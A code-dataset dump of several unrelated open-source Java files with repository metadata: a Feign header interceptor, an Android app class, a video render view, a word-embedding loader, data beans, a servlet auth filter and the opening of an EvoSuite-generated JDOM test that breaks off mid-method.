Apache-2.0
2019-10-11T19:04:31
2019-10-11T19:04:31
null
UTF-8
Java
false
false
6,818
java
package com.nepxion.discovery.plugin.strategy.service.aop; /** * <p>Title: Nepxion Discovery</p> * <p>Description: Nepxion Discovery</p> * <p>Copyright: Copyright (c) 2017-2050</p> * <p>Company: Nepxion</p> * @author Haojun Ren * @version 1.0 */ import feign.RequestInterceptor; import feign.RequestTemplate; import java.util.Collection; import java.util.Enumeration; import java.util.List; import java.util.Map; import javax.servlet.http.HttpServletRequest; import org.apache.commons.collections4.CollectionUtils; import org.apache.commons.lang3.StringUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Value; import org.springframework.web.context.request.ServletRequestAttributes; import com.nepxion.discovery.common.constant.DiscoveryConstant; import com.nepxion.discovery.plugin.strategy.constant.StrategyConstant; import com.nepxion.discovery.plugin.strategy.service.adapter.FeignStrategyInterceptorAdapter; import com.nepxion.discovery.plugin.strategy.service.route.ServiceStrategyRouteFilter; public class FeignStrategyInterceptor extends AbstractStrategyInterceptor implements RequestInterceptor { private static final Logger LOG = LoggerFactory.getLogger(FeignStrategyInterceptor.class); @Autowired(required = false) private List<FeignStrategyInterceptorAdapter> feignStrategyInterceptorAdapterList; @Autowired private ServiceStrategyRouteFilter serviceStrategyRouteFilter; @Value("${" + StrategyConstant.SPRING_APPLICATION_STRATEGY_TRACE_ENABLED + ":false}") protected Boolean strategyTraceEnabled; public FeignStrategyInterceptor(String contextRequestHeaders, String businessRequestHeaders) { super(contextRequestHeaders, businessRequestHeaders); LOG.info("----------- Feign Intercept Information ----------"); LOG.info("Feign desires to intercept customer headers are {}", requestHeaderList); LOG.info("--------------------------------------------------"); } @Override public void apply(RequestTemplate requestTemplate) { interceptInputHeader(); applyInnerHeader(requestTemplate); applyOuterHeader(requestTemplate); if (CollectionUtils.isNotEmpty(feignStrategyInterceptorAdapterList)) { for (FeignStrategyInterceptorAdapter feignStrategyInterceptorAdapter : feignStrategyInterceptorAdapterList) { feignStrategyInterceptorAdapter.apply(requestTemplate); } } interceptOutputHeader(requestTemplate); } private void applyInnerHeader(RequestTemplate requestTemplate) { requestTemplate.header(DiscoveryConstant.N_D_SERVICE_GROUP, pluginAdapter.getGroup()); if (strategyTraceEnabled) { requestTemplate.header(DiscoveryConstant.N_D_SERVICE_TYPE, pluginAdapter.getServiceType()); requestTemplate.header(DiscoveryConstant.N_D_SERVICE_ID, pluginAdapter.getServiceId()); requestTemplate.header(DiscoveryConstant.N_D_SERVICE_ADDRESS, pluginAdapter.getHost() + ":" + pluginAdapter.getPort()); requestTemplate.header(DiscoveryConstant.N_D_SERVICE_VERSION, pluginAdapter.getVersion()); requestTemplate.header(DiscoveryConstant.N_D_SERVICE_REGION, pluginAdapter.getRegion()); } } private void applyOuterHeader(RequestTemplate requestTemplate) { ServletRequestAttributes attributes = serviceStrategyContextHolder.getRestAttributes(); if (attributes == null) { return; } HttpServletRequest previousRequest = attributes.getRequest(); Enumeration<String> headerNames = previousRequest.getHeaderNames(); if (headerNames == null) { return; } while (headerNames.hasMoreElements()) { String headerName = headerNames.nextElement(); String headerValue = previousRequest.getHeader(headerName); boolean isHeaderContains = isHeaderContainsExcludeInner(headerName.toLowerCase()); if (isHeaderContains) { requestTemplate.header(headerName, headerValue); } } Map<String, Collection<String>> headers = requestTemplate.headers(); if (CollectionUtils.isEmpty(headers.get(DiscoveryConstant.N_D_VERSION))) { String routeVersion = serviceStrategyRouteFilter.getRouteVersion(); if (StringUtils.isNotEmpty(routeVersion)) { requestTemplate.header(DiscoveryConstant.N_D_VERSION, routeVersion); } } if (CollectionUtils.isEmpty(headers.get(DiscoveryConstant.N_D_REGION))) { String routeRegion = serviceStrategyRouteFilter.getRouteRegion(); if (StringUtils.isNotEmpty(routeRegion)) { requestTemplate.header(DiscoveryConstant.N_D_REGION, routeRegion); } } if (CollectionUtils.isEmpty(headers.get(DiscoveryConstant.N_D_ADDRESS))) { String routeAddress = serviceStrategyRouteFilter.getRouteAddress(); if (StringUtils.isNotEmpty(routeAddress)) { requestTemplate.header(DiscoveryConstant.N_D_ADDRESS, routeAddress); } } if (CollectionUtils.isEmpty(headers.get(DiscoveryConstant.N_D_VERSION_WEIGHT))) { String routeVersionWeight = serviceStrategyRouteFilter.getRouteVersionWeight(); if (StringUtils.isNotEmpty(routeVersionWeight)) { requestTemplate.header(DiscoveryConstant.N_D_VERSION_WEIGHT, routeVersionWeight); } } if (CollectionUtils.isEmpty(headers.get(DiscoveryConstant.N_D_REGION_WEIGHT))) { String routeRegionWeight = serviceStrategyRouteFilter.getRouteRegionWeight(); if (StringUtils.isNotEmpty(routeRegionWeight)) { requestTemplate.header(DiscoveryConstant.N_D_REGION_WEIGHT, routeRegionWeight); } } } private void interceptOutputHeader(RequestTemplate requestTemplate) { if (!interceptDebugEnabled) { return; } System.out.println("------- Intercept Output Header Information ------"); Map<String, Collection<String>> headers = requestTemplate.headers(); for (Map.Entry<String, Collection<String>> entry : headers.entrySet()) { String headerName = entry.getKey(); boolean isHeaderContains = isHeaderContains(headerName.toLowerCase()); if (isHeaderContains) { Collection<String> headerValue = entry.getValue(); System.out.println(headerName + "=" + headerValue); } } System.out.println("--------------------------------------------------"); } }
[ "1394997@qq.com" ]
1394997@qq.com
e7f35601e1ac5839670c425dfa3395eaef58f7b4
b137f712bc4c810818c8b774050ecf7941d9f1bb
/app/src/main/java/cn/tsthuah/zuanqianbaay/MyApp.java
b3aa9f0f042b06321f9daebc768d7a782b76d0f1
[]
no_license
wangyingowen/ZuanqianBaay
c0a634e1ea5ad5d9db1f2e6872879d92ae6a97d9
1138175fd27ae84295659571fdf7bce9c957baee
refs/heads/master
2020-04-28T08:49:33.223806
2019-03-15T00:06:54
2019-03-15T00:06:54
175,143,556
0
0
null
null
null
null
UTF-8
Java
false
false
712
java
package cn.tsthuah.zuanqianbaay; import android.app.Application; import android.util.Log; import com.umeng.commonsdk.UMConfigure; public class MyApp extends Application { private static MyApp instance; public static MyApp getInstance() { if (instance == null) { synchronized (MyApp.class) { if (null == instance) { instance = new MyApp(); } } } return instance; } @Override public void onCreate() { super.onCreate(); UMConfigure.init(this, UMConfigure.DEVICE_TYPE_PHONE, "1fe6a20054bcef865eeb0991ee84525b"); Log.e("wangying","初始化成功了吗?"); } }
[ "wangying@uestcdp.com" ]
wangying@uestcdp.com
55943f23d6fa52eaba324e0d1c31c835ca75e4a0
2a262663309ba6232e4eeda092b97ca697289ab2
/jackplayer/src/main/java/com/lishuaihua/jackplayer/widget/TextureRenderView.java
70f54a86b8447ab534006865f8c35014f8643b84
[]
no_license
ewgcat/AndroidPlayer
49501fd58a7828c73aa1cd37ca34f2a013cf94f2
3ea9af0ea09e53c62d909852f4b561d35b9c0d1a
refs/heads/master
2023-03-10T11:46:01.752604
2021-02-17T13:52:02
2021-02-17T13:52:02
339,671,424
0
0
null
null
null
null
UTF-8
Java
false
false
8,133
java
package com.lishuaihua.jackplayer.widget; import android.annotation.SuppressLint; import android.content.Context; import android.graphics.Bitmap; import android.graphics.SurfaceTexture; import android.util.AttributeSet; import android.util.Log; import android.view.Surface; import android.view.SurfaceHolder; import android.view.TextureView; import android.view.View; import androidx.annotation.NonNull; import androidx.annotation.Nullable; import java.lang.ref.WeakReference; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import tv.danmaku.ijk.media.player.IMediaPlayer; public class TextureRenderView extends TextureView implements IRenderView { private MeasureHelper mMeasureHelper; private Listener mSurfaceTextureListener; public TextureRenderView(Context context) { super(context); initView(context); } public TextureRenderView(Context context, AttributeSet attrs) { super(context, attrs); initView(context); } public TextureRenderView(Context context, AttributeSet attrs, int defStyleAttr) { super(context, attrs, defStyleAttr); initView(context); } private void initView(Context context) { mSurfaceTextureListener = new Listener(this); mMeasureHelper = new MeasureHelper(this); setSurfaceTextureListener(mSurfaceTextureListener); } @Override public View getView() { return this; } @Override public boolean shouldWaitForResize() { return false; } @Override public void setVideoSize(int videoWidth, int videoHeight) { if (videoWidth > 0 && videoHeight > 0) { mMeasureHelper.setVideoSize(videoWidth, videoHeight); requestLayout(); } } @Override public void setVideoSampleAspectRatio(int videoSarNum, int videoSarDen) { if (videoSarNum > 0 && videoSarDen > 0) { mMeasureHelper.setVideoSampleAspectRatio(videoSarNum, videoSarDen); requestLayout(); } } @Override public void setVideoRotation(int degree) { if (degree != getRotation()) { Log.i("setVideoRotation", "degree:" + degree); mMeasureHelper.setVideoRotation(degree); super.setRotation(degree); requestLayout(); } } @Override public void setAspectRatio(int aspectRatio) { mMeasureHelper.setAspectRatio(aspectRatio); requestLayout(); } @Override protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) { mMeasureHelper.doMeasure(widthMeasureSpec, heightMeasureSpec); setMeasuredDimension(mMeasureHelper.getMeasuredWidth(), mMeasureHelper.getMeasuredHeight()); } @Override public void addRenderCallback(@NonNull IRenderCallback callback) { mSurfaceTextureListener.addRenderCallback(callback); } @Override public void removeRenderCallback(@NonNull IRenderCallback callback) { mSurfaceTextureListener.removeRenderCallback(callback); } @SuppressLint("NewApi") @Override protected void onVisibilityChanged(View changedView, int visibility) { super.onVisibilityChanged(changedView, visibility); if (mSurfaceTextureListener != null && visibility == View.VISIBLE) { if (mSurfaceTextureListener.mSurfaceTexture != null) { setSurfaceTexture(mSurfaceTextureListener.mSurfaceTexture); } } } @Override public Bitmap getLastFrame() { return mSurfaceTextureListener.lastBitMap; } private static final class Listener implements SurfaceTextureListener { SurfaceTexture mSurfaceTexture; Surface mSurface; Bitmap lastBitMap; private int mWidth; private int mHeight; private Map<IRenderCallback, Object> mRenderCallbackMap = new ConcurrentHashMap<>(); private WeakReference<TextureRenderView> mWeakSurfaceView; public Listener(@NonNull TextureRenderView view) { mWeakSurfaceView = new WeakReference<>(view); } @Override public void onSurfaceTextureAvailable(SurfaceTexture surface, int width, int height) { mWidth = 0; mHeight = 0; mSurfaceTexture = surface; mSurface = new Surface(surface); ISurfaceHolder surfaceHolder = new InternalSurfaceHolder(mWeakSurfaceView.get(), mSurfaceTexture, mSurface); for (IRenderCallback renderCallback : mRenderCallbackMap.keySet()) { renderCallback.onSurfaceCreated(surfaceHolder, 0, 0); } } @Override public void onSurfaceTextureSizeChanged(SurfaceTexture surface, int width, int height) { mSurfaceTexture = surface; mWidth = width; mHeight = height; ISurfaceHolder surfaceHolder = new InternalSurfaceHolder(mWeakSurfaceView.get(), mSurfaceTexture, mSurface); for (IRenderCallback renderCallback : mRenderCallbackMap.keySet()) { renderCallback.onSurfaceChanged(surfaceHolder, -1, width, height); } } @Override public boolean onSurfaceTextureDestroyed(SurfaceTexture surface) { ISurfaceHolder surfaceHolder = new InternalSurfaceHolder(mWeakSurfaceView.get(), mSurfaceTexture, mSurface); for (IRenderCallback renderCallback : mRenderCallbackMap.keySet()) { renderCallback.onSurfaceDestroyed(surfaceHolder); } mSurfaceTexture.release(); mSurfaceTexture = null; Surface s = mSurface; mSurface = null; s.release(); return false; } @Override public void onSurfaceTextureUpdated(SurfaceTexture surface) { lastBitMap = mWeakSurfaceView.get().getBitmap(); } public void addRenderCallback(@NonNull IRenderCallback callback) { mRenderCallbackMap.put(callback, callback); ISurfaceHolder surfaceHolder = null; if (mSurfaceTexture != null) { surfaceHolder = new InternalSurfaceHolder(mWeakSurfaceView.get(), mSurfaceTexture, mSurface); callback.onSurfaceCreated(surfaceHolder, mWidth, mHeight); } } public void removeRenderCallback(@NonNull IRenderCallback callback) { mRenderCallbackMap.remove(callback); } } private static final class InternalSurfaceHolder implements ISurfaceHolder { private TextureRenderView mRenderView; private SurfaceTexture mSurfaceTexture; private Surface mSurface; public InternalSurfaceHolder(@NonNull TextureRenderView surfaceView, @Nullable SurfaceTexture surfaceHolder, @Nullable Surface surface) { mRenderView = surfaceView; mSurfaceTexture = surfaceHolder; mSurface = surface; } public void bindToMediaPlayer(IMediaPlayer mp) { if (mp != null) { // if ((Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN) && // (mp instanceof ISurfaceTextureHolder)) { // ISurfaceTextureHolder textureHolder = (ISurfaceTextureHolder) mp; // textureHolder.setSurfaceTexture(null); // } Log.i("bindToMediaPlayer", "mSurface isValid" + mSurface.isValid()); mp.setSurface(mSurface); } } @NonNull @Override public IRenderView getRenderView() { return mRenderView; } @Nullable @Override public SurfaceHolder getSurfaceHolder() { return null; } @Nullable @Override public SurfaceTexture getSurfaceTexture() { return mSurfaceTexture; } @Nullable @Override public Surface openSurface() { return mSurface; } } }
[ "850716183@qq.com" ]
850716183@qq.com
f57256a0801ac6cc5f7faabb382afecc1f2c465f
b84bfe3df870fe20d5ca05e04e4231ef01eccfdd
/src/cs276/pa4/Embedding.java
2779fed267b473ef0b28bebb4239793729d6e5b4
[]
no_license
elui/machine-learning-information-retrieval
8b3fed34277442b613460085179e0ea0ad4be7ba
cac492f7c01044f4d6cf5846b626f768695200f9
refs/heads/master
2021-01-23T11:20:38.298257
2017-06-03T04:29:15
2017-06-03T04:29:15
93,129,891
0
0
null
null
null
null
UTF-8
Java
false
false
6,284
java
package cs276.pa4; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.FileReader; import java.io.IOException; import java.io.InputStreamReader; import java.util.Collection; import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; import java.util.Set; import java.util.zip.GZIPInputStream; import org.ejml.simple.SimpleMatrix; /** * Class that can help use embeddings as features. * Might be helpful for extra-credit */ public class Embedding { private Map<String, SimpleMatrix> wordVectors; private int embeddingSize; static final String START_WORD = "*START*"; static final String END_WORD = "*END*"; static final String UNKNOWN_WORD = "*UNK*"; public Embedding(String wordVectorFile, boolean isGoogleEmbedding) { this.wordVectors = new HashMap<String, SimpleMatrix>(); System.err.println("# Loading embedding ...\n word vector file = " + wordVectorFile); try { BufferedReader br = null; if(wordVectorFile.endsWith(".gz")){ br = new BufferedReader(new InputStreamReader(new GZIPInputStream(new FileInputStream(wordVectorFile)))); } else { br = new BufferedReader(new FileReader(wordVectorFile)); } if(isGoogleEmbedding) { br.readLine(); } // skip the header line loadWordVectors(br); } catch (IOException e) { e.printStackTrace(); } } /** * This method reads a file of raw word vectors, with a given expected size, and returns a map of word to vector. * <br> * The file should be in the format * ....<br> * <code>WORD X1 X2 X3 ...</code> <br> * If vectors in the file are smaller than expectedSize, an * exception is thrown. If vectors are larger, the vectors are * truncated and a warning is printed. * @throws IOException * @throws NumberFormatException */ private void loadWordVectors(BufferedReader br) throws IOException { int dimOfWords = 0; boolean warned = false; int numWords = 0; String line = null; while((line=br.readLine()) != null) { String[] lineSplit = line.split("\\s+"); String word = lineSplit[0]; // check for unknown token if(word.equals("UNKNOWN") || word.equals("UUUNKKK") || word.equals("UNK") || word.equals("*UNKNOWN*") || word.equals("<unk>")){ word = UNKNOWN_WORD; } // check for start token if(word.equals("<s>")){ word = START_WORD; } // check for end token if(word.equals("</s>")){ word = START_WORD; } dimOfWords = lineSplit.length - 1; if (embeddingSize <= 0) { embeddingSize = dimOfWords; System.err.println(" detected embedding size = " + dimOfWords); } // the first entry is the word itself // the other entries will all be entries in the word vector if (dimOfWords > embeddingSize) { if (!warned) { warned = true; System.err.println("WARNING: Dimensionality of numHid parameter and word vectors do not match, deleting word vector dimensions to fit!"); } dimOfWords = embeddingSize; } else if (dimOfWords < embeddingSize) { br.close(); throw new RuntimeException("Word vectors file has dimension too small for requested numHid of " + embeddingSize); } double vec[][] = new double[dimOfWords][1]; for (int i = 1; i <= dimOfWords; i++) { vec[i-1][0] = Double.parseDouble(lineSplit[i]); } SimpleMatrix vector = new SimpleMatrix(vec); wordVectors.put(word, vector); numWords++; } br.close(); System.err.println(" num words = " + numWords); } /** * Check if a word has vectors in the wordVector matrix * @param word * @return true if the word has a vector representation */ public boolean hasWord(String word){ return wordVectors.containsKey(word); } /** * Return the size of wordVectors * @return size of the wordVector matrix */ public int size(){ return wordVectors.size(); } /** * Collection of the values of wordVectors * @return values associated with the wordVectors */ public Collection<SimpleMatrix> values(){ return wordVectors.values(); } /** * Get set of all the keys stored in WordVectors * @return A set of all the keys in wordVectors */ public Set<String> keySet(){ return wordVectors.keySet(); } public Set<Entry<String, SimpleMatrix>> entrySet(){ return wordVectors.entrySet(); } /** * Returns the vector representation of the word * @param word: String for which we want the vector representation * @return Vector representation of the word */ public SimpleMatrix get(String word) { if(wordVectors.containsKey(word)){ return wordVectors.get(word); } else { return wordVectors.get(UNKNOWN_WORD); } } /** * Get vector representation of the start-word of the embedding * @return Vector representation of the start word */ public SimpleMatrix getStartWordVector() { return wordVectors.get(START_WORD); } /** * Get vector representation of the end-word of the embedding * @return Vector representation of the ending word */ public SimpleMatrix getEndWordVector() { return wordVectors.get(END_WORD); } /** * Get vector representation of the unknown word of the embedding * @return Vector representation for words that are not present * in wordVector matrix */ public SimpleMatrix getUnknownWordVector() { return wordVectors.get(UNKNOWN_WORD); } /** * Return a set of all the words stored in the wordVector matrix * @return */ public Set<String> words() { return wordVectors.keySet(); } public int getEmbeddingSize() { return embeddingSize; } /** * A simple example showing how to use this class to import wordVectors * @param args * @throws Exception */ public static void main(String[] args) throws Exception { String wordVectorFile = "data/wordVectors.txt.gz"; Embedding embedding = new Embedding(wordVectorFile, false); for (String word : embedding.words()) { System.err.println(word + "\t" + embedding.get(word).transpose()); } } }
[ "elliott.lui@gmail.com" ]
elliott.lui@gmail.com
78dc919a9155a07c7a8a5ba5bd921745fe5cc34e
6e37df8b9e373292a5bfd6cfc60a64b50d688944
/app/src/main/java/com/a2driano/city/my/weather/data/retrofit/model/WeatherDTO.java
cd6a519ab1b1220f15afe6f766be9381655c9601
[]
no_license
a2driano/WeatherCity
3dc6321ebf7f8cd8d0b5ad9a202310d06679ca59
5b5296838e6f6d624d831198fa28c8bef374a225
refs/heads/master
2021-07-03T03:09:39.798648
2017-09-24T19:08:29
2017-09-24T19:08:29
103,817,273
0
0
null
null
null
null
UTF-8
Java
false
false
3,613
java
package com.a2driano.city.my.weather.data.retrofit.model; import com.a2driano.city.my.weather.data.retrofit.model.component.Clouds; import com.a2driano.city.my.weather.data.retrofit.model.component.Coord; import com.a2driano.city.my.weather.data.retrofit.model.component.Main; import com.a2driano.city.my.weather.data.retrofit.model.component.Sys; import com.a2driano.city.my.weather.data.retrofit.model.component.Weather; import com.a2driano.city.my.weather.data.retrofit.model.component.Wind; import com.google.gson.annotations.Expose; import com.google.gson.annotations.SerializedName; import java.util.List; /** * Created by Andrii Papai on 17.09.2017. */ public class WeatherDTO { @SerializedName("coord") @Expose private Coord coord; @SerializedName("weather") @Expose private List<Weather> weather = null; @SerializedName("base") @Expose private String base; @SerializedName("main") @Expose private Main main; @SerializedName("visibility") @Expose private long visibility; @SerializedName("wind") @Expose private Wind wind; @SerializedName("clouds") @Expose private Clouds clouds; @SerializedName("dt") @Expose private long dt; @SerializedName("sys") @Expose private Sys sys; @SerializedName("id") @Expose private long id; @SerializedName("name") @Expose private String name; @SerializedName("cod") @Expose private long cod; public Coord getCoord() { return coord; } public void setCoord(Coord coord) { this.coord = coord; } public List<Weather> getWeather() { return weather; } public void setWeather(List<Weather> weather) { this.weather = weather; } public String getBase() { return base; } public void setBase(String base) { this.base = base; } public Main getMain() { return main; } public void setMain(Main main) { this.main = main; } public long getVisibility() { return visibility; } public void setVisibility(long visibility) { this.visibility = visibility; } public Wind getWind() { return wind; } public void setWind(Wind wind) { this.wind = wind; } public Clouds getClouds() { return clouds; } public void setClouds(Clouds clouds) { this.clouds = clouds; } public long getDt() { return dt; } public void setDt(long dt) { this.dt = dt; } public Sys getSys() { return sys; } public void setSys(Sys sys) { this.sys = sys; } public long getId() { return id; } public void setId(long id) { this.id = id; } public String getName() { return name; } public void setName(String name) { this.name = name; } public long getCod() { return cod; } public void setCod(long cod) { this.cod = cod; } @Override public String toString() { return "WeatherDTO{" + "coord=" + coord + ", weather=" + weather + ", base='" + base + '\'' + ", main=" + main + ", visibility=" + visibility + ", wind=" + wind + ", clouds=" + clouds + ", dt=" + dt + ", sys=" + sys + ", id=" + id + ", name='" + name + '\'' + ", cod=" + cod + '}'; } }
[ "a2driano@gmail.com" ]
a2driano@gmail.com
5091ec4fc511695f49508c1bd06c16cf9e591cca
04e80a25d4cb0d783434d056ca2b6b37bf8c5729
/CreditoGrupalUtilitario/src/main/java/utilitario/comun/FechaTiempo.java
1a868d8ca025446f9a91c4faed30e1b8805641c4
[]
no_license
FyGIntegracionContinua/CIOFF
bfbd2040de503bacc44e376899bddcd4e3db9fd6
20c63dbc01fea60a426ebd49227efb7b8c413567
refs/heads/master
2021-01-15T11:03:31.184075
2017-08-18T20:12:05
2017-08-18T20:12:05
99,607,645
0
1
null
null
null
null
UTF-8
Java
false
false
3,422
java
package utilitario.comun; /** * clase que contiene los tiempos trancurridos * @author rmontellano * @version 4.17 */ public class FechaTiempo { /**hora en que se asigna solicitus*/ private int horaAlta; /** horas trancurridas desde que se envio el correo*/ private int horasTranscurridas; /** dias trancurridos desde que se envio el correo*/ private int diasTranscurridos; /**meses trnacurridos desde que se envia el correo*/ private int mesesTranscurridos; /**años trancurridos desde que se envio el correo*/ private int yearsTrancurridos; /**intervalo de tiempo inicial de horario habil 8*/ private int intervaloInicial; /**intervalo de tiempo final de horario habil 20*/ private int intervaloFinal; /**Estus de la tarea*/ private String estatusTarea; /** * @return the horasTranscurridas */ public int getHorasTranscurridas() { return horasTranscurridas; } /** * @param horasTranscurridas the horasTranscurridas to set */ public void setHorasTranscurridas(int horasTranscurridas) { this.horasTranscurridas = horasTranscurridas; } /** * @return the diasTranscurridos */ public int getDiasTranscurridos() { return diasTranscurridos; } /** * @param diasTranscurridos the diasTranscurridos to set */ public void setDiasTranscurridos(int diasTranscurridos) { this.diasTranscurridos = diasTranscurridos; } /** * @return the mesesTranscurridos */ public int getMesesTranscurridos() { return mesesTranscurridos; } /** * @param mesesTranscurridos the mesesTranscurridos to set */ public void setMesesTranscurridos(int mesesTranscurridos) { this.mesesTranscurridos = mesesTranscurridos; } /** * @return the yearsTrancurridos */ public int getYearsTrancurridos() { return yearsTrancurridos; } /** * @param yearsTrancurridos the yearsTrancurridos to set */ public void setYearsTrancurridos(int yearsTrancurridos) { this.yearsTrancurridos = yearsTrancurridos; } /** * @return the horaAlta */ public int getHoraAlta() { return horaAlta; } /** * @param horaAlta the horaAlta to set */ public void setHoraAlta(int horaAlta) { this.horaAlta = horaAlta; } /** * @return the intervaloInicial */ public int getIntervaloInicial() { return intervaloInicial; } /** * @param intervaloInicial the intervaloInicial to set */ public void setIntervaloInicial(int intervaloInicial) { this.intervaloInicial = intervaloInicial; } /** * @return the intervaloFinal */ public int getIntervaloFinal() { return intervaloFinal; } /** * @param intervaloFinal the intervaloFinal to set */ public void setIntervaloFinal(int intervaloFinal) { this.intervaloFinal = intervaloFinal; } /** * @return the estatusTarea */ public String getEstatusTarea() { return estatusTarea; } /** * @param estatusTarea the estatusTarea to set */ public void setEstatusTarea(String estatusTarea) { this.estatusTarea = estatusTarea; } /* (non-Javadoc) * @see java.lang.Object#toString() */ @Override public String toString() { return "horaAlta:" + horaAlta + "\thorasTranscurridas: " + horasTranscurridas + "\tdiasTranscurridos:" + diasTranscurridos + "\tmesesTranscurridos: " + mesesTranscurridos + "\tyearsTrancurridos:" + yearsTrancurridos + "\tintervaloInicial:" + intervaloInicial + "\tintervaloFinal:" + intervaloFinal + "\testatusTarea:" + estatusTarea; } }
[ "christian.lopez@fygsolutions.com" ]
christian.lopez@fygsolutions.com
a44cc09d25c9e21141cc78b106ea8b4512061fa6
2bc2890c53e4524cb0af271ddaf68e2b6dfce4cf
/HowtoUpload/src/reddy/tutorial/classes/inheritance/itemp/JavaEmp.java
484ee01aa966bfd91c28f4327cdec55c2d8fa808
[]
no_license
aneesh5168/howtoUpload
1e918a9f4b0f6de2fc3ace9ab412eef3a966883b
da13de2ecb74de8a0e078d249274ba4dd7c033c5
refs/heads/master
2021-01-23T21:02:40.414467
2017-07-08T18:01:47
2017-07-08T18:01:47
90,672,347
0
0
null
null
null
null
UTF-8
Java
false
false
803
java
package reddy.tutorial.classes.inheritance.itemp; import reddy.tutorial.classes.inheritance.Kickable; import reddy.tutorial.classes.inheritance.Swimmable; public class JavaEmp extends ITEmployee implements Swimmable, Kickable { public JavaEmp(int empId, String name) { super(empId, name); } @Override public void vehcile() { System.out.println("Java Vechicle"); } @Override public String tieColor() { // TODO Auto-generated method stub return "tie color is javawhite"; } public String ObjectConceptKnow(){ return "very good knowledge"; } @Override public void swimming() { System.out.println(" i am java Guy who is bad at swimming"); } @Override public void kick() { System.out.println(" Good kicker"); } }
[ "HP@HP-PC" ]
HP@HP-PC
5b3c7b1786036a01334206d582ca97c25687154d
6231f0b207b5d94e6d30232e8ddaf4022a767276
/src/main/java/com/cox/controller/AuthFilter.java
d55f4bfb4bb431ddf45ab3f69b353f398b4d907f
[]
no_license
guhilaut/Tutorial
5120deca4efdd779085ac7feac49b6b17c1554e9
c92dd838e7934b562187287c10aa1f2c18d17610
refs/heads/master
2020-06-14T13:24:07.381271
2016-11-30T10:58:56
2016-11-30T10:58:56
75,176,625
1
0
null
null
null
null
UTF-8
Java
false
false
1,469
java
package com.cox.controller; import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import com.cox.service.model.User; public class AuthFilter implements Filter{ FilterConfig filterConfig; @Override public void destroy() { // TODO Auto-generated method stub } @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain) throws IOException, ServletException { HttpServletRequest httpRequest = (HttpServletRequest)request; HttpSession session = httpRequest.getSession(); User user = (User)session.getAttribute("user"); if(!session.isNew() && user == null){ throwForbidden(response); }else{ filterChain.doFilter(request, response); } } @Override public void init(FilterConfig filterConfig) throws ServletException { this.filterConfig = filterConfig; } private void throwForbidden(ServletResponse res) throws IOException { HttpServletResponse response = (HttpServletResponse) res; response.reset(); response.setHeader("Content-Type", "application/json;charset=UTF-8"); response.sendError(HttpServletResponse.SC_FORBIDDEN); } }
[ "guhilaut.amar@gmail.com" ]
guhilaut.amar@gmail.com
4c31a414bb51f89221394c264ffc54bb29945fba
c885ef92397be9d54b87741f01557f61d3f794f3
/tests-without-trycatch/JxPath-19/org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer/BBC-F0-opt-80/10/org/apache/commons/jxpath/ri/model/jdom/JDOMNodePointer_ESTest.java
03904fd2d4f9ae616b29ed09c149c583831216de
[ "CC-BY-4.0", "MIT" ]
permissive
pderakhshanfar/EMSE-BBC-experiment
f60ac5f7664dd9a85f755a00a57ec12c7551e8c6
fea1a92c2e7ba7080b8529e2052259c9b697bbda
refs/heads/main
2022-11-25T00:39:58.983828
2022-04-12T16:04:26
2022-04-12T16:04:26
309,335,889
0
1
null
2021-11-05T11:18:43
2020-11-02T10:30:38
null
UTF-8
Java
false
false
61,501
java
/* * This file was automatically generated by EvoSuite * Thu Oct 14 03:23:38 GMT 2021 */ package org.apache.commons.jxpath.ri.model.jdom; import org.junit.Test; import static org.junit.Assert.*; import static org.evosuite.runtime.EvoAssertions.*; import java.util.Collection; import java.util.HashMap; import java.util.LinkedList; import java.util.Locale; import org.apache.commons.jxpath.BasicVariables; import org.apache.commons.jxpath.JXPathContext; import org.apache.commons.jxpath.ri.NamespaceResolver; import org.apache.commons.jxpath.ri.QName; import org.apache.commons.jxpath.ri.compiler.NodeNameTest; import org.apache.commons.jxpath.ri.compiler.NodeTest; import org.apache.commons.jxpath.ri.compiler.NodeTypeTest; import org.apache.commons.jxpath.ri.compiler.ProcessingInstructionTest; import org.apache.commons.jxpath.ri.model.NodeIterator; import org.apache.commons.jxpath.ri.model.NodePointer; import org.apache.commons.jxpath.ri.model.VariablePointer; import org.apache.commons.jxpath.ri.model.jdom.JDOMNodePointer; import org.evosuite.runtime.EvoRunner; import org.evosuite.runtime.EvoRunnerParameters; import org.evosuite.runtime.testdata.EvoSuiteFile; import org.jdom.Attribute; import org.jdom.CDATA; import org.jdom.Comment; import org.jdom.Content; import org.jdom.DocType; import org.jdom.Document; import org.jdom.Element; import org.jdom.Namespace; import org.jdom.ProcessingInstruction; import org.jdom.Text; import org.junit.runner.RunWith; @RunWith(EvoRunner.class) @EvoRunnerParameters(mockJVMNonDeterminism = true, useVFS = true, useVNET = true, resetStaticState = true, separateClassLoader = true) public class JDOMNodePointer_ESTest extends JDOMNodePointer_ESTest_scaffolding { @Test(timeout = 4000) public void test000() throws Throwable { Element element0 = new Element("x", "x", "x"); Locale locale0 = Locale.KOREAN; HashMap<Integer, Element> hashMap0 = new HashMap<Integer, Element>(); ProcessingInstruction processingInstruction0 = new ProcessingInstruction("x", hashMap0); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(processingInstruction0, locale0); JDOMNodePointer jDOMNodePointer1 = new JDOMNodePointer(jDOMNodePointer0, element0); String string0 = jDOMNodePointer1.asPath(); assertEquals("/processing-instruction('x')[1]/x:x[1]", string0); } @Test(timeout = 4000) public void test001() throws Throwable { Element element0 = new Element("org.jdom.CDATA", "org.jdom.CDATA"); QName qName0 = new QName("oIg.jdom.CDATA"); VariablePointer variablePointer0 = new VariablePointer(qName0); JDOMNodePointer jDOMNodePointer0 = new JDOMNodePointer(variablePointer0, element0); QName qName1 = new QName("", "M(hC]Ln%:pPF/QH"); // Undeclared exception! // try { jDOMNodePointer0.createAttribute((JXPathContext) null, qName1); // fail("Expecting exception: IllegalArgumentException"); // } 